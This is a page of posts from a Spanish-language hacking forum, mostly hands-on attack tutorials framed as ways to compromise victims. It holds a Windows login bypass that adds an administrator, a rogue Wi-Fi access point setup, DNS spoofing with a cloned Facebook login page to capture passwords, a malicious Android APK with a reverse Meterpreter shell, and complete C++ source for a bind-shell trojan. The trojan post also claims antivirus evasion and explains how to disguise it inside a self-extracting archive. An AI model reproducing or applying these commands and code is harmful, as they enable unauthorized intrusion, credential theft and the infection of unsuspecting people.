elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Los 10 CVE más críticos (peligrosos) de 2020


  Mostrar Temas
Páginas: 1 [2] 3
11  Seguridad Informática / Hacking / Entrar a cuenta de Windows 7 saltando la contraseña en: 6 Abril 2014, 05:22 am
Este es un método para entrar en sistemas Windows un poco antiguo y bastante sencillote y agresivo. Sin embargo, a lo largo de las versiones de Windows no han parcheado nunca y, de hecho, poca documentación es la que he encontrado al respecto.

Normalmente, para entrar en una máquina Windows sin tener autorización para ello, era necesario saber las contraseñas, ya sean del usuario o de administrador, esto se hacía “a mano” o con distribuciones de Linux especificas y con la ayuda de alguna tabla Rainbow. Otra forma era utilizar Kon-Boot para parchear el proceso de autenticación en memoria.

A continuación, se explicará una forma de poder crear un usuario administrador, sin haber tenido que acceder con algún usuario que ya fuera administrador de la máquina anteriormente.

Todos sabemos que Windows está especialmente concienciado con las opcines de accesibilidad, teniendo en cuenta por ejemplo, a la personas con dificultades para leer bien, por lo que incluso al hacer el login ya te da la opción de usar las utilidades para ayudar a estas personas.



Por lógica, esto es un programa que te busca el cursor y todo lo que tenga alrededor lo hace mas grande. Sin embargo, pensando cómo es Windows o en general cualquier sistema operativo, todo programa estará asociado a una cuenta que sea la que lo haya ejecutado. Pero...¿Qué cuenta lo ejecuta si ni hemos puesto la contraseña de la nuestra? Por lógica debería de ser uno con privilegios mínimos.

Vamos a probar....

1º Descargamos alguna distribución Linux en pendrive como Ubuntu o sucedáneos o algún bartpc.
2º Arrancamos desde ese usb y montamos al partición de windows.
3º Nos vamos a la ruta C:\Windows\System32
4º Nos hacemos una copia de seguridad del fichero Magnify.exe.



5º Borramos o renombramos el fichero Magnify.exe.
6º Copiamos el fichero cmd.exe y lo cambiamos de nombre a Magnify.exe




7º Reiniciamos el ordenador y dejamos que arranque Windows.



8º Volvemos a ejecutar la herramienta de lupa



Ahora se nos abrira una shell como administrador donde crearemos un usuario llamado test cpn la siguiente linea de comandos

Código:
net user /add test2
net localgroup administrators test2 /add
net user test2 *



y listo  ;D
12  Seguridad Informática / Hacking / Karmetasploit en: 31 Marzo 2014, 00:17 am
                                       

Karmetasploit sirve para crear puntos de acceso falsos, capturar contraseñas, recopilar infomación, y llevar a los ataques de navegador contralos clientes.

Cuando un usuario se conecta a nuestro AP Fake, la dirección IP la estará asignando el servicio DHCP, y posteriormente karmetasploit intentará ejecutar todos los exploits sobre la maquina objetivo en busca de alguna vulnerabilidad e intentará conseguir una sesión meterpreter.

Descargamos Karmetasploit

Instalamos dhcpd3-server

Código:
sudo apt-get install isc-dhcp-server

Una ves instalado procederemos a configurarlo, Quedando de la siguiente manera.

Código:
#
# Sample configuration file for ISC dhcpd for Debian
#
# Attention: If /etc/ltsp/dhcpd.conf exists, that will be used as
# configuration file instead of this file.
#
#

# The ddns-updates-style parameter controls whether or not the server will
# attempt to do a DNS update when a lease is confirmed. We default to the
# behavior of the version 2 packages ('none', since DHCP v2 didn't
# have support for DDNS.)
ddns-update-style none;

# option definitions common to all supported networks...
option domain-name "10.0.0.1";
option domain-name-servers 10.0.0.1;

default-lease-time 60;
max-lease-time 72;

# If this DHCP server is the official DHCP server for the local
# network, the authoritative directive should be uncommented.
#authoritative;

# Use this to send dhcp log messages to a different log file (you also
# have to hack syslog.conf to complete the redirection).
log-facility local7;

# No service will be given on this subnet, but declaring it helps the
# DHCP server to understand the network topology.

#subnet 10.0.0.0 netmask 255.255.255.0 {
#}

# This is a very basic subnet declaration.

#subnet 10.0.0.0 netmask 255.255.255.0 {
#  range 10.0.0.100 10.0.0.254;
#  option routers 10.0.0.1;
#}

Luego procedemos a editar /opt/backbox/msf/data/exploits/capture/http/sites.txt donde están almacenados todos los sitios en los que metasploit intentará robar cookies.
 
Ahora comenzamos poniendo nuestra tarjeta en modo monitor, en mi caso es la wlan0

Código:
airmon-ng start wlan0

Se activará así la interfaz mon0 la cual podemos cambiarle la dirección MAC si lo creemos necesario:

Código:
ifconfig mon0 down && macchanger -r mon0 && ifconfig mon0 up

Una vez que la interfaz está lista ya podemos crear nuestro punto de acceso con la ayuda de airbase-ng, tecleemos lo siguiente en la consola:

Código:
airbase-ng -P -C 30 -c 6 -e “red_falsa” mon0

Donde mon0 es nuestra tarjeta en modo monitor y “red_falsa” es el nombre que queramos darle a nuestra red.

Este paso anterior nos creará una nueva interfaz llamada at0 a la cual vamos a darle una ip y activamos el servidor dhcp desde otra terminal:

Código:
ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
dhcpd -cf /etc/dhcp/dhcpd.conf at0

Ahora iniciamos mestasploit con karma.

Código:
msfconsole -r karma.rc

Al iniciar karmetasploit les aparecerá:
13  Comunicaciones / Dispositivos Móviles (PDA's, Smartphones, Tablets) / Como liberar un modem de pendrive en: 6 Marzo 2014, 06:10 am
Hola, en mi país hay redes que van mas rápido que otras, como sucede en casi todo el mundo. yo compre un modem Digitel pero es mucho mas lento que el Movistar así que les voy a enseñar como liberar modems de pendrive por si tienen el mismo problema...


Para esto necesitaremos:

  • Un modem de pendrive
  • DC-unloker que lo pueden descargar de aqui https://www.dc-unlocker.com/downloads

    Empecemos...


    1. Conecta tu Módem al computador con el SIM de la compañia que queremos usar.

    2. Abra el DC unlocker.

    3. Seleccione el fabricante del dispositivo que desea desbloquear. en mi caso, seleccione "ZTE datacards".

    4. Haga clic en el icono de búsqueda para detectar el dispositivo.



    5. Seleccione ficha "Unlocking" para ver los detalles del modem.

    6. Ahora haga clic en "Unlock". esperar durante unos pocos segundos. Si el proceso se ha realizado correctamente, debería decir algo como "Unlocking sucefull"



    7. Instalar el gestor de Conexiones y configurar los ajustes en función de la configuración de país proveedor de la red y listo



    Esto ha sido todo espero les funcione  ;D
14  Seguridad Informática / Hacking / [AYUDA] Descargar HOIC en Klali Linux en: 18 Febrero 2014, 23:57 pm
    Hola a todos, tengo una duda. ¿Como descargo la herramienta HOIC (Hight Orbit Ion Cannon) en mi Kali Linux

    No se si hay una pagina para descargarlo o un link para pegar en la source list y descargarlo con apt-get
15  Seguridad Informática / Hacking / Kali Linux o BackTrack 5 R3 ? en: 20 Enero 2014, 04:39 am
La verdad es que no se mucho de Kali, no se que me recomiendan para hacking avanzado, no se si darle un poco mas de tiempo a kali para que saque nuevas versiones, que me recomiendan ?
16  Seguridad Informática / Hacking / Como mando un exploit a una ip remota ? en: 19 Enero 2014, 22:12 pm
Buenas, quisiera saber como puedo mandar un exploit a una dirección ip rémora, es decir fuera de mi LAN
17  Seguridad Informática / Hacking / DNS Sppofing para recolectar usuarios y contraseñas en: 19 Enero 2014, 21:05 pm
Suplantación de identidad por nombre de dominio. Se trata del falseamiento de una relación "Nombre de dominio-IP" ante una consulta de resolución de  nombre, es decir, resolver con una dirección IP falsa un cierto nombre NS o viceversa. Esto se consigue falseando las entradas de la relación Nombre de dominio-IP de un servidor DNS, mediante alguna vulnerabilidad del servidor en concreto o por su confianza hacia servidores poco fiables. Las entradas falseadas de un servidor DNS son susceptibles de infectar (envenenar) el cache DNS de otro servidor diferente (DNS Poisoning).

El siguiente ataque se realizo bajo una LAN, el atacante usando BackTrack 5 R3 y la victima Windows 7, Cabe destacar que el sistema operativo de la victima es irrelevante

La idea de este ataque es capturar el usuario y la contraseña de una cuenta de Facebook, esto funciona con cualquier pagina que pida usuario y contraseña

Herramientas a usar:

Social Engineer Tool-kit
Ettercap

Empecemos...


1.) ingresamos a la siguiente ruta:

Código:
#cd /pentest/exploits/set

#./set

Se abrirá la aplicación SET para ataques de ingeniería social



Seleccionamos 1 para ataques de ingeniería social



Seleccionamos 2 para vectores de ataques a sitios web

[imghttp://1.bp.blogspot.com/--pTpSfgFRJY/UQKo30BMTBI/AAAAAAAAAus/o8sfjf_PYzk/s640/dns03.jpg]http://[/img]

Seleccionamos 3 para recolector de credenciales y clonar la pagina

[imghttp://4.bp.blogspot.com/-r3hiPfAGSU8/UQKo4ccje4I/AAAAAAAAAu4/krnBkJoWefI/s640/dns04.jpg][/img]

Seleccionamos 2 para clonar el sitio



Ahora colocamos nuestra ip



Ahora nos pedirá la pagina a la que queremos clonar, en nuestro caso facebook



Una vez finalizado empezara a iniciar el clonado a la pagina web, es necesario tener el servicio de apache iniciado, en caso de que no lo este, nos aparecerá el siguiente mensaje



Bueno hasta acá tenemos la configuración con éxitos para poder realizar el envenenamiento por dns ,la victima tendría que poner nuestra dirección IP en su navegador,y a continuación aparecería el mensaje de login  de Facebook.



Para que el usuario no ingrese nuestra dirección IP, ocuparemos una herramienta llamada ettetcap, su función sera que cuando el usuario ingrese a facebook se envenene automáticamente y no tenga que ingresar nuestra IP. Para ello con un editor de texto editamos la siguiente ruta
Código:

/usr/local/share/ettercap/etter.dns
y agregamos los siguientes parámetros

Código:
Dominio.com             A     IP
*.Dominio                 A     IP
www.dominio.com     PTR  IP



Le damos a guardar y cerramos el editor, ahora envenenamos usando ettercap, escribimos:

Código:
ettercap -T -q -i Adaptador de red -P dns_spoof -M arp // //



Y ahora cuando la victima ingrese a facebook y ponga su usuario y contraseña



Recibimos la información de la cookies GET que captura en la lan.



Bueno espero que les haya gustado, y no olviden que. EL SIGUIENTE POST ES CON FINES DIDACTICOS
 ;) MoonShadow
18  Seguridad Informática / Hacking Wireless / Necesito ayuda con las redes OPN en: 19 Enero 2014, 15:52 pm
Por donde vivio hay una red OPN, ya he descifrado WEP, WPA, WPA2 PSK pero no se como desencritar las OPN, tengo entendido que para acceder a una se necesita un usuario y una contraseña. AYUDA
19  Seguridad Informática / Hacking / Les mostrare como hackear un android en: 18 Enero 2014, 23:21 pm
Hoy les mostrare como hackear un android que se encuentre en una red local usando Metasploit en BackTrack 5

1.) Actualicen su Metasploit, para asegurarse de que se le cargara los exploits...etc pues estos que usaremos son Actuales.

2.) Una vez hecho eso pondremos en Metasploit lo siguiente....

Código:
search Android

Bueno, ahora puedes ver que sacaron un Exploit Handler + 2 Payload! eso nos da la posibilidad de hacer un APK infectada

Código:
sudo msfpayload android/meterpreter/reverse_tcp  LHOST="Tu ip" LPORT=Puerto R > "Ruta+ Aplicación.apk

Ejemplo :

sudo msfpayload android/meterpreter/reverse_tcp  LHOST=192.168.1.35 LPORT=23 R > /root/Desktop/Hack.apk


Bueno con eso se les creara un Apk infectada, se lo enviamos y ponemos a la escucha nuestro exploit 

por qué pongo “R” si siempre se crea el ejecutable con “X” , tenemos que decirle a msfpayload que use la salida RAW. Eso en otros payloads nos sacaría el shellcode sin formato, pero en el caso de Android nos sacara un apk

Bueno una vez hecho eso, cargamos el exploit ......

Código:
sudo msfcli exploit/multi/handler PAYLOAD=android/meterpreter/reverse_tcpLHOST=”Su ip puesta en el backdoor” LPORT="Su puerto" E

Ejemplo:

sudo msfcli exploit/multi/handler PAYLOAD=android/meterpreter/reverse_tcpLHOST=192.168.1.35 LPORT=25 E

Bueno ahora la victima cuando instale la Apk, infectada nos saldrá esto....

Código:
       =[ metasploit v4.7.0-1 [core:4.7 api:1.0]
+ -- --=[ 1141 exploits - 720 auxiliary - 194 post
+ -- --=[ 309 payloads - 30 encoders - 8 nops

PAYLOAD=> android/meterpreter/reverse_tcp
LHOST=> 192.168.1.35

[*] Started reverse handler on 192.168.1.35:4444
[*] Starting the payload handler...
[*] Sending stage (39698 bytes) to 192.168.1.34
[*] Meterpreter session 1 opened (192.168.1.35:4444 -> 192.168.1.34:40715) at 2014-01-10 05:02:51 +0200

meterpreter >


Ya que tenemos la sesión en meterpreter escrbimos "help" para ver los comando que nos da meterpreter para este dispositvo

Espero les guste 
20  Seguridad Informática / Análisis y Diseño de Malware / Troyano en C++ indetectable!! en: 18 Enero 2014, 15:25 pm
Les traigo como hacer un troyano intetectable

1. Se bajan un programa llamado "DEV C++" que utilizaremos para crear nuestra shell ( si no sabes que es no importa sigue leyendo).

2. Ahora que ya está instalado buscamos por internet cualquier código que se llame "win32 bind shell" y luego creamos un nuevo proyecto con nuestro dev cpp, le decimos que será "windows mode" o modo ventana y le pegan el código encontrado:
Troyano casero indetectable

Si no encontraron nada no importa, acá les traigo una:

Código:
Citar
#include <winsock2.h>
#pragma comment(linker,"/ENTRY:WinMain"

int WINAPI WinMain(HINSTANCE , HINSTANCE , LPSTR ,int ){

STARTUPINFO si;
struct sockaddr_in sa;
PROCESS_INFORMATION pi;
int s;
WSADATA HWSAdata;
WSAStartup(0x101, &HWSAdata);

s=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,0,0,0);

sa.sin_family = AF_INET;
sa.sin_port = 0x901F; // (USHORT)htons(8080);
sa.sin_addr.s_addr= 0x00; // htonl(INADDR_ANY);

bind(s, (struct sockaddr *) &sa, 16);
listen(s, 1);
s= accept(s,(struct sockaddr *)&sa,NULL);

si.cb = sizeof(si); // 0x44;
si.wShowWindow = SW_HIDE; // 0x00
si.dwFlags = STARTF_USESHOWWINDOW+STARTF_USESTDHANDLES; // 0x101
si.hStdInput = si.hStdOutput = si.hStdError = (void *) s;

si.lpDesktop = si.lpTitle = (char *) 0x0000;
si.lpReserved2 = NULL;

CreateProcess(NULL ,"cmd",NULL, NULL,TRUE, 0,NULL,NULL,(STARTUPINFO*)&si,&pi);
}



Esta shell está programada para dejar un puerto abierto en el 8080, ahora debemos darle propiedades al proyecto y donde dice "argumentos" les saldrá un rectángulo al lado derecho y le pegan esto:
Cita:

Citar
../../../../Dev-Cpp/lib/libws2_32.a
../../../../Dev-Cpp/lib/libwsock32.a

Ahora le dan click en el botón que dice "compilar" y les generará su backdoor o troyano.

indetectable a:

AhnLab-V3 2011.05.08.00 2011.05.07 -
AntiVir 7.11.7.176 2011.05.06 -
Antiy-AVL 2.0.3.7 2011.05.08 -
Avast 4.8.1351.0 2011.05.07 -
Avast5 5.0.677.0 2011.05.07 -
AVG 10.0.0.1190 2011.05.07 -
BitDefender 7.2 2011.05.08 -
CAT-QuickHeal 11.00 2011.05.07 -
ClamAV 0.97.0.0 2011.05.07 -
Commtouch 5.3.2.6 2011.05.07 -
Comodo 8619 2011.05.08 -
DrWeb 5.0.2.03300 2011.05.08 -
eSafe 7.0.17.0 2011.05.05 -
eTrust-Vet 36.1.8312 2011.05.06 -
F-Prot 4.6.2.117 2011.05.08 -
F-Secure 9.0.16440.0 2011.05.08 -
Fortinet 4.2.257.0 2011.05.08 -
GData 22 2011.05.08 -
Ikarus T3.1.1.103.0 2011.05.07 -
Jiangmin 13.0.900 2011.05.05 -
K7AntiVirus 9.102.4584 2011.05.06 -
Kaspersky 9.0.0.837 2011.05.08 -
McAfee 5.400.0.1158 2011.05.08 -
McAfee-GW-Edition 2010.1D 2011.05.07 -
Microsoft 1.6802 2011.05.07 -
NOD32 6103 2011.05.07 -
Norman 6.07.07 2011.05.07 -
Panda 10.0.3.5 2011.05.07 -
PCTools 7.0.3.5 2011.05.06 -
Prevx 3.0 2011.05.08 -
Rising 23.56.05.03 2011.05.07 -
Sophos 4.65.0 2011.05.07 -
SUPERAntiSpyware 4.40.0.1006 2011.05.08 -
Symantec 20101.3.2.89 2011.05.08 -
TheHacker 6.7.0.1.189 2011.05.06 -
TrendMicro 9.200.0.1012 2011.05.07 -
TrendMicro-HouseCall 9.200.0.1012 2011.05.08 -
VBA32 3.12.16.0 2011.05.08 -
VIPRE 9218 2011.05.08 -
ViRobot 2011.5.7.4450 2011.05.07 -
VirusBuster 13.6.342.0 2011.05.07 -

antivirus infalible aun no existe, cuando exista me avisan para usarlo.

3.
Ahora que ya tenemos nuestro troyano indetectable no se lo podemos pasar así como así a la persona que se va a infectar, lo debemos ocultar con algo y para eso utilizaremos WINRAR, lo descargamos, lo instaladmos y cuando esté listo debemos conseguirnos cualquier programa, de lo que sea pero que se ejecute en un solo archivo, esto es para que cuando se ejecute el troyano también se ejecute ese programa y no levante sospechas.

Ahora para hacer todo mas fácil renombro ese programa a firefox.exe solamente ( si ustedes no pueden ver el .exe del programa no le pongan .exe otraves)

Ahora solo deben seleciconar el troyano mas el firefox y darle click donde dice "añadir al archivo", le damos click donde dice crear archivo autoejecutable o SFX y en opciones le damos en ocultar todo y en ejecución le decimos esto:

Citar
cmd /c bpid.exe && firefox.exe

Ruta de extracción le ponemos %homepath% para prevenir que nos salte el UAC de window 7

Ahora le damos en aceptar todo y tenemos nuestro archivo, si quieren ponerle íconos personalizados pueden buscar cualquier tutorial de como usar winrar autoejecutables.

4.
Ahora le damos ese archivo a la persona que vamos a infectar y cuando lo ejecute dejará un puerto abierto que es el 8080 y nos conectamos desde netcat:

Citar
nc -v IP_ACA 8080

y ya, nos saldrá la consola de su pc y ya con eso podemos hacerle de todo, mover archivos, subir o bajarle cosas etc y todo 100% indetectable.

Espero les haya gustado  ;D
Páginas: 1 [2] 3
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines